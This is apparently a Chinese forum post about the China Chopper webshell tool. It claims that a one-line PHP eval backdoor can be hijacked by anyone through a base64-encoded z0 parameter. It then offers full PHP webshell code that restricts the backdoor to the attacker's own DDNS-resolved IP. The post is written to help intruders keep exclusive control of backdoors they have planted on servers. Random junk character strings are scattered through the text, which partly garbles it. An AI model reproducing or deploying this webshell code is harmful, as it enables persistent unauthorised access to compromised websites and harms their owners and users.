今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
% h5 b# J* [% O
- X+ _& X0 [/ X就算你设置了密码,使用了eval($_REQUEST['moyo']); O7 ~7 w. N( z
5 l/ Q. ~/ x9 P0 ]7 Z
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
! b8 k# H8 @& }# H# v( z/ V9 v$ e) X. P+ ~
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
4 X* I6 W1 K b% V# q/ n6 q7 }2 {7 u9 m: r: `' x( |) [7 N
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了# K! _7 n: X+ ^5 v. w
% y! e/ l y7 G
不知道是设计缺陷还是故意留的后门2 X% r Z- _( h# {
' ^) t! _, V' a如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
7 A, a9 w9 z! G0 W6 y4 ]' k% T3 N* F% | P" \. v& s
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org1 ~$ {- }- @$ c m. P* D
# n6 J/ l! I' [4 ?6 s' B% l
然后一句话后门这样写
; }4 P$ a5 R5 B$ |% n9 M" M% }
& {! \. ]9 L9 k( o j: S _$ q<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>: p% ^% Q" m$ c. L7 ^0 K8 f. |
这样就可以让一句话后门只允许自己的电脑连接了5 `( p) \# Z1 ]1 c( K: A* k
* P- t5 p. f6 q
|